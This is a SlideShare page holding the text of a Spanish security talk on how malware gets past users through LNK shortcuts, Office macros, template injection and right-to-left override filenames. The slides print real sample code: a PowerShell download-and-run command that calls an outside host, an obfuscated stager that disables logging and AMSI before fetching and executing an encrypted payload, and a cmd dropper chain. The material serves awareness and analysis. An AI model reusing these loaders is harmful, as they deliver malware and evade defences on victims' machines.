SlideShare una empresa de Scribd logo
1 de 20
Descargar para leer sin conexión
-BYPASSING THE USER SKILL-
MANUEL BERMÚDEZ CASADO
• Manuel Bermúdez Casado
YO
¿DE QUÉ VA ESTO?
• En las empresas cada vez gastamos mas dinero en Concienciar a los usuarios.
• El malware cada vez es mas ingenioso y buscan técnicas par desviar la
atención de los usuarios.
• Cada vez hay menos malware en ficheros ejecutables “.exe”.
• La ingeniería social sigue siendo el mayor vector de ataques a las empresas.
• El usuario sigue siendo el eslabón mas débil de la ciberseguridad en las empresas.
¿EL ENGAÑO?
CON LOS HACKERS NO FUNCIONA
Con los hackers funciona Tetas, Gatitos y Chema, no necesariamente en ese orden.
¿QUÉ VAMOS A VER?
• Ejemplos:
• 9ae013ae0cf7c758c9d4b70fe998c65d LNK powershell descarga de fichero
• 19d9760572b36caa2055390395848ca3 LNK Powershell descarga fichero
• 0f28aaaa78ec7fd7360a902f70c5da60 LNK CMD
• 3466eb3495a1618e7c37cf1e553d71a2 XlS con Macros.
• A42687f1e0bcf49c2172b975e68b63f7 Doc con Macros
• 3c432a21cfd05f976af8c47a007928f7 Doc Template injection
LNK POWERSHELL I DESCARGA FICHERO II
9ae013ae0cf7c758c9d4b70fe998c65d
%WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%sys'+'t.e'+'xe'; $a = New-
Object System.Net.WebClient; $a.DownloadFile('http://hecforex.info/wp-includes/upd.exe','%TEMP%sys'+'t.e'+'xe'); &($cmd) -FilePath
$b;
LNK POWERSHELL I DESCARGA DE FICHERO
9ae013ae0cf7c758c9d4b70fe998c65d
Baja detección en de los Antivirus
LNK POWERSHELL II
19d9760572b36caa2055390395848ca3
powershell -noP -sta -w 1 -enc
SQBGACgAJABQAFMAVgBFAFIAcw……………………………..AFYAaQBjAEUAUABPAEkATgBUAE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AHAARQBjAHQAMQAwADAAQwBvAG4AdABJAGAEoATwBJAG4AWwBDAGgAQQB
SAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA3
IF($PSVERsIOnTablE.PSVErsion.MAjOR -ge
3){$GPF=[Ref].ASSEMBlY.GeTTyPE('System.Management.Automation.Utils')."GETFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GetVaLue($NulL);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'
+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[CoLlectIOnS.GenerIC.DiCtIonaRY[STRInG,SyStEm.OBjecT]]::NEW();$VAL.ADd('EnableScriptB'+'lockL
ogging',0);$VAL.AdD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$VAl}Else{[ScRipTBlocK]."GETFIe`ld"('signatures','N'+'onP
ublic,Static').SEtVaLuE($NULL,(NEW-ObJeCT
COLLectioNS.GenERiC.HasHSET[stRING]))}[ReF].ASSEMBLy.GEtTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIElD('amsiInitFailed','NonPublic,Static').SetVAlue($NuLL,$tRUe)};};[SYstem.NET.SeRVicEPOINTMAnA
geR]::ExpEct100ContInuE=0;$wc=New-OBjEcT SYstEM.NeT.WEbClIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeaDerS.Add('User-
Agent',$u);$wc.PROxy=[SYstem.NET.WEbREqUESt]::DeFAulTWEBPROxY;$wC.PRoxY.CREdenTiaLs = [System.Net.CRedeNtIALCaCHe]::DEFaUlTNeTwOrKCreDENTiAlS;$Script:Proxy =
$wc.Proxy;$K=[SYStEM.TExT.EnCOdinG]::ASCII.GEtBYteS('ee7beb7cda0e26af79dc0d2ecb5d166f');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I
=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-
BxOR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.16.2.176:80';$t='/admin/get.php';$Wc.HeaDeRs.ADD("Cookie","session=QDsxgCrIClPG6hPAj2tJAXiQw5U=");$DaTa=$WC.DOwNlOaDDAta($Ser+$T);$IV=$DaTA[0..3];$dA
Ta=$dAtA[4..$DATa.LENgTh];-JOIn[ChAR[]](& $R $DATa ($IV+$K))|IEX
LNK POWERSHELL II
19d9760572b36caa2055390395848ca3
LNK CMD
0f28aaaa78ec7fd7360a902f70c5da60
%windir%system32cmd.exe /V:ON /C @echo off&set "f=Voda_rozchinnik" &cd "%temp%"&for /f "tokens=*" %i in ('dir /b /AD /O-D') do if exist "%i!f!.lnk" more +1378 "%i!f!.lnk"
>81.js&&wscript.exe 81.js >"!f!.exe"&&start "" "!f!.exe"&&
C:WindowsSystem32cmd.exe
%windir%system32cmd.exe WScript.StdOut.Write("x4dx5a
x00x03x00x00x00x04x00x00x00
x00x00
x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00
x00x00x00x00
LNK CMD
0f28aaaa78ec7fd7360a902f70c5da60
CLASICO XLS CON MACROS
• 3466eb3495a1618e7c37cf1e553d71a2
CLASICO XLS CON MACROS
• 3466eb3495a1618e7c37cf1e553d71a2
CLASICO DOC CON MACROS
• a42687f1e0bcf49c2172b975e68b63f7
CLASICO DOC CON MACROS
• a42687f1e0bcf49c2172b975e68b63f7
TEMPLATE INJECTION
• 3c432a21cfd05f976af8c47a007928f7
TEMPLATE INJECTION
• 3c432a21cfd05f976af8c47a007928f7
RTLO TÉCNICA
RIGHT TO LEFT OVERRIDE
RIGHT TO LEFT OVERRIDE
GRACIAS

Más contenido relacionado

Similar a Bypassing the user skill

Introducción a la Seguridad Informática
Introducción a la Seguridad InformáticaIntroducción a la Seguridad Informática
Introducción a la Seguridad InformáticaAmadeoHerrera
 
Seguridad Informática: Hackers
Seguridad Informática: HackersSeguridad Informática: Hackers
Seguridad Informática: HackersSandra Esposito
 
Enthec Solutions - Presentando a Kartos
Enthec Solutions - Presentando a  KartosEnthec Solutions - Presentando a  Kartos
Enthec Solutions - Presentando a Kartosmirojo
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticatatii2011
 
Citas de los ponentes de la VIII Jornada Internacional de ISMS Forum
Citas de los ponentes de la VIII Jornada Internacional de ISMS ForumCitas de los ponentes de la VIII Jornada Internacional de ISMS Forum
Citas de los ponentes de la VIII Jornada Internacional de ISMS ForumISMS Forum
 
Actualizaciones automaticas desistemaa operativo
Actualizaciones automaticas desistemaa operativoActualizaciones automaticas desistemaa operativo
Actualizaciones automaticas desistemaa operativoyuyeraldin
 
Un hacker del_lado_del_bien
Un hacker del_lado_del_bienUn hacker del_lado_del_bien
Un hacker del_lado_del_bienOscar Eduardo
 
Seguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasSeguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasMaurice Frayssinet
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umhAlejandro Quesada
 

Similar a Bypassing the user skill (20)

Introducción a la Seguridad Informática
Introducción a la Seguridad InformáticaIntroducción a la Seguridad Informática
Introducción a la Seguridad Informática
 
Seguridad Informática: Hackers
Seguridad Informática: HackersSeguridad Informática: Hackers
Seguridad Informática: Hackers
 
Seguridad Informatica
Seguridad InformaticaSeguridad Informatica
Seguridad Informatica
 
Enthec Solutions - Presentando a Kartos
Enthec Solutions - Presentando a  KartosEnthec Solutions - Presentando a  Kartos
Enthec Solutions - Presentando a Kartos
 
Hackers y ciberdelito
Hackers y ciberdelitoHackers y ciberdelito
Hackers y ciberdelito
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Citas de los ponentes de la VIII Jornada Internacional de ISMS Forum
Citas de los ponentes de la VIII Jornada Internacional de ISMS ForumCitas de los ponentes de la VIII Jornada Internacional de ISMS Forum
Citas de los ponentes de la VIII Jornada Internacional de ISMS Forum
 
archivo_202267161541.pptx
archivo_202267161541.pptxarchivo_202267161541.pptx
archivo_202267161541.pptx
 
Revista
RevistaRevista
Revista
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Actualizaciones automaticas desistemaa operativo
Actualizaciones automaticas desistemaa operativoActualizaciones automaticas desistemaa operativo
Actualizaciones automaticas desistemaa operativo
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 
Un hacker del_lado_del_bien
Un hacker del_lado_del_bienUn hacker del_lado_del_bien
Un hacker del_lado_del_bien
 
Seguridad en la red
Seguridad en la redSeguridad en la red
Seguridad en la red
 
Seguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologiasSeguridad de la informacion mitos y tecnologias
Seguridad de la informacion mitos y tecnologias
 
Tarea tecnología n2
Tarea tecnología n2Tarea tecnología n2
Tarea tecnología n2
 
Summer boot camp sciende umh
Summer boot camp sciende umhSummer boot camp sciende umh
Summer boot camp sciende umh
 
Tarea tecnología
Tarea tecnologíaTarea tecnología
Tarea tecnología
 
Tarea tecnología
Tarea tecnologíaTarea tecnología
Tarea tecnología
 

Último

Mapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptxMapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptxjose880240
 
Presentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la WebPresentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la Webfernandalunag19
 
Emprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoEmprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoCENECOnline
 
Esquema Organizacional Cosapi (Constructora)
Esquema Organizacional Cosapi (Constructora)Esquema Organizacional Cosapi (Constructora)
Esquema Organizacional Cosapi (Constructora)Eder Diaz Flores
 
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...danielpoza1
 
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdfAntenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdfperezreyesalberto10
 
diapositivas tiktok.KAY (1) (1) (1).pptx
diapositivas tiktok.KAY (1) (1) (1).pptxdiapositivas tiktok.KAY (1) (1) (1).pptx
diapositivas tiktok.KAY (1) (1) (1).pptxLDACORGANIZACION
 

Último (7)

Mapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptxMapas Conceptuales finales Rubén finales.pptx
Mapas Conceptuales finales Rubén finales.pptx
 
Presentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la WebPresentacion Seguridad y Privacidad en la Web
Presentacion Seguridad y Privacidad en la Web
 
Emprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC MexicoEmprende en SPA Segundo día CENEC Mexico
Emprende en SPA Segundo día CENEC Mexico
 
Esquema Organizacional Cosapi (Constructora)
Esquema Organizacional Cosapi (Constructora)Esquema Organizacional Cosapi (Constructora)
Esquema Organizacional Cosapi (Constructora)
 
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
P7_E1_DanielPoza.pdf Los avances en los sistemas de comunicascion y su difusi...
 
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdfAntenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
Antenas, tipos de antenas, diseño basico de una antena y parámetros.pdf
 
diapositivas tiktok.KAY (1) (1) (1).pptx
diapositivas tiktok.KAY (1) (1) (1).pptxdiapositivas tiktok.KAY (1) (1) (1).pptx
diapositivas tiktok.KAY (1) (1) (1).pptx
 

Bypassing the user skill

  • 1. -BYPASSING THE USER SKILL- MANUEL BERMÚDEZ CASADO
  • 3. ¿DE QUÉ VA ESTO? • En las empresas cada vez gastamos mas dinero en Concienciar a los usuarios. • El malware cada vez es mas ingenioso y buscan técnicas par desviar la atención de los usuarios. • Cada vez hay menos malware en ficheros ejecutables “.exe”. • La ingeniería social sigue siendo el mayor vector de ataques a las empresas. • El usuario sigue siendo el eslabón mas débil de la ciberseguridad en las empresas.
  • 5. CON LOS HACKERS NO FUNCIONA Con los hackers funciona Tetas, Gatitos y Chema, no necesariamente en ese orden.
  • 6. ¿QUÉ VAMOS A VER? • Ejemplos: • 9ae013ae0cf7c758c9d4b70fe998c65d LNK powershell descarga de fichero • 19d9760572b36caa2055390395848ca3 LNK Powershell descarga fichero • 0f28aaaa78ec7fd7360a902f70c5da60 LNK CMD • 3466eb3495a1618e7c37cf1e553d71a2 XlS con Macros. • A42687f1e0bcf49c2172b975e68b63f7 Doc con Macros • 3c432a21cfd05f976af8c47a007928f7 Doc Template injection
  • 7. LNK POWERSHELL I DESCARGA FICHERO II 9ae013ae0cf7c758c9d4b70fe998c65d %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%sys'+'t.e'+'xe'; $a = New- Object System.Net.WebClient; $a.DownloadFile('http://hecforex.info/wp-includes/upd.exe','%TEMP%sys'+'t.e'+'xe'); &($cmd) -FilePath $b;
  • 8. LNK POWERSHELL I DESCARGA DE FICHERO 9ae013ae0cf7c758c9d4b70fe998c65d Baja detección en de los Antivirus
  • 9. LNK POWERSHELL II 19d9760572b36caa2055390395848ca3 powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAFIAcw……………………………..AFYAaQBjAEUAUABPAEkATgBUAE0AQQBuAEEAZwBlAFIAXQA6ADoARQB4AHAARQBjAHQAMQAwADAAQwBvAG4AdABJAGAEoATwBJAG4AWwBDAGgAQQB SAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA3 IF($PSVERsIOnTablE.PSVErsion.MAjOR -ge 3){$GPF=[Ref].ASSEMBlY.GeTTyPE('System.Management.Automation.Utils')."GETFiE`LD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($GPF){$GPC=$GPF.GetVaLue($NulL);IF($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB' +'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[CoLlectIOnS.GenerIC.DiCtIonaRY[STRInG,SyStEm.OBjecT]]::NEW();$VAL.ADd('EnableScriptB'+'lockL ogging',0);$VAL.AdD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsPowerShellScriptB'+'lockLogging']=$VAl}Else{[ScRipTBlocK]."GETFIe`ld"('signatures','N'+'onP ublic,Static').SEtVaLuE($NULL,(NEW-ObJeCT COLLectioNS.GenERiC.HasHSET[stRING]))}[ReF].ASSEMBLy.GEtTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFIElD('amsiInitFailed','NonPublic,Static').SetVAlue($NuLL,$tRUe)};};[SYstem.NET.SeRVicEPOINTMAnA geR]::ExpEct100ContInuE=0;$wc=New-OBjEcT SYstEM.NeT.WEbClIEnT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$WC.HeaDerS.Add('User- Agent',$u);$wc.PROxy=[SYstem.NET.WEbREqUESt]::DeFAulTWEBPROxY;$wC.PRoxY.CREdenTiaLs = [System.Net.CRedeNtIALCaCHe]::DEFaUlTNeTwOrKCreDENTiAlS;$Script:Proxy = $wc.Proxy;$K=[SYStEM.TExT.EnCOdinG]::ASCII.GEtBYteS('ee7beb7cda0e26af79dc0d2ecb5d166f');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUNt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I =($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_- BxOR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.16.2.176:80';$t='/admin/get.php';$Wc.HeaDeRs.ADD("Cookie","session=QDsxgCrIClPG6hPAj2tJAXiQw5U=");$DaTa=$WC.DOwNlOaDDAta($Ser+$T);$IV=$DaTA[0..3];$dA Ta=$dAtA[4..$DATa.LENgTh];-JOIn[ChAR[]](& $R $DATa ($IV+$K))|IEX
  • 11. LNK CMD 0f28aaaa78ec7fd7360a902f70c5da60 %windir%system32cmd.exe /V:ON /C @echo off&set "f=Voda_rozchinnik" &cd "%temp%"&for /f "tokens=*" %i in ('dir /b /AD /O-D') do if exist "%i!f!.lnk" more +1378 "%i!f!.lnk" >81.js&&wscript.exe 81.js >"!f!.exe"&&start "" "!f!.exe"&& C:WindowsSystem32cmd.exe %windir%system32cmd.exe WScript.StdOut.Write("x4dx5a x00x03x00x00x00x04x00x00x00 x00x00 x00x00x00x00x00x00x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 x00x00x00x00
  • 13. CLASICO XLS CON MACROS • 3466eb3495a1618e7c37cf1e553d71a2
  • 14. CLASICO XLS CON MACROS • 3466eb3495a1618e7c37cf1e553d71a2
  • 15. CLASICO DOC CON MACROS • a42687f1e0bcf49c2172b975e68b63f7
  • 16. CLASICO DOC CON MACROS • a42687f1e0bcf49c2172b975e68b63f7
  • 19. RTLO TÉCNICA RIGHT TO LEFT OVERRIDE RIGHT TO LEFT OVERRIDE